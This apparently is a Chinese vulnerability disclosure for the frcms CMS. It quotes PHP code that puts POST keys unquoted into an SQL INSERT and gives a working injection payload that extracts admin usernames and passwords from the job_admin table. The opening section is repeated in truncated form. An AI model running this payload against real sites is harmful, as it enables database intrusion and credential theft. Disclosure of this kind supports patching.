### 简要描述: 求20rank ### 详细说明: 首先看到frcms\member\requires_list.php ``` if($do=="savedata"){ if($_POST['id']==""){ $_POST['sid']=intval($Memberid); $_POST['member']=_getcookie('user_login'); $_POST['school']=_getcookie('user_name'); if(empty($_POST['title'])){ showmsg('标题不能为空!','-1');exit; } $_POST['adddate']=date('Y-m-d H:i:s'); unset($_POST['submit'],$_POST['reset'],$_POST['id']); $tks=$tvs=''; foreach($_POST as $key=>$value){ if($value==''){ continue; }else{ $tks.="r_$key,"; $tvs.="'$value',"; } } $tks=substr($tks,0,-1); //var_dump($tks); $tvs=substr($tvs,0,-1); $sql="insert into {$cfg['tb_pre']}require ($tks) values($tvs)"; //var_dump($sql); $db ->query($sql); showmsg("添加成功!","?m=requires_list&show=$show");exit; ``` 可以看到POST的key没有进过单引号直接进入了insert语句。 首先注册一个企业会员 [<img src="https://images.seebug.org/upload/201502/24154022bc75ed918a241b9e802340152c4a2a9d.png" alt="1.png" width="600"...
### 简要描述: 求20rank ### 详细说明: 首先看到frcms\member\requires_list.php ``` if($do=="savedata"){ if($_POST['id']==""){ $_POST['sid']=intval($Memberid); $_POST['member']=_getcookie('user_login'); $_POST['school']=_getcookie('user_name'); if(empty($_POST['title'])){ showmsg('标题不能为空!','-1');exit; } $_POST['adddate']=date('Y-m-d H:i:s'); unset($_POST['submit'],$_POST['reset'],$_POST['id']); $tks=$tvs=''; foreach($_POST as $key=>$value){ if($value==''){ continue; }else{ $tks.="r_$key,"; $tvs.="'$value',"; } } $tks=substr($tks,0,-1); //var_dump($tks); $tvs=substr($tvs,0,-1); $sql="insert into {$cfg['tb_pre']}require ($tks) values($tvs)"; //var_dump($sql); $db ->query($sql); showmsg("添加成功!","?m=requires_list&show=$show");exit; ``` 可以看到POST的key没有进过单引号直接进入了insert语句。 首先注册一个企业会员 [<img src="https://images.seebug.org/upload/201502/24154022bc75ed918a241b9e802340152c4a2a9d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/24154022bc75ed918a241b9e802340152c4a2a9d.png) 然后访问 ``` http://127.0.0.1/frcms/member/?m=requires_list ``` 然后添加招生简历 [<img src="https://images.seebug.org/upload/201502/24154055e898dddf9acd758ebc8cf36fbe3e2f99.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/24154055e898dddf9acd758ebc8cf36fbe3e2f99.png) 然后抓包 [<img src="https://images.seebug.org/upload/201502/24154109d1144620fea3d49d931181a5f114ed44.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/24154109d1144620fea3d49d931181a5f114ed44.png) 构造 ``` title,r_member,r_sid,r_content,r_flag,r_school,r_adddate)values('xxxx1','papapa','3','1',char(@`'`),(select(group_concat(a_user,0x7c,a_pass))from%0a%0ajob_admin),now())#=1&title=sssss&content=sssssssssss&id=&submit=%CC%ED+%BC%D3 ``` 因为key直接进入了sql中。然后发包。可以看到mysql的日志文件 [<img src="https://images.seebug.org/upload/201502/2415413910714b6a7c3af440b861e26dca61ae5e.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/2415413910714b6a7c3af440b861e26dca61ae5e.png) 语句已经执行了。然后查看招生简历 [<img src="https://images.seebug.org/upload/201502/24154204f5dbdfb8995c26733c2c93de253a3c4c.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/24154204f5dbdfb8995c26733c2c93de253a3c4c.png) 可以看到账户密码已经出来了。 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201502/24154204f5dbdfb8995c26733c2c93de253a3c4c.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/24154204f5dbdfb8995c26733c2c93de253a3c4c.png)
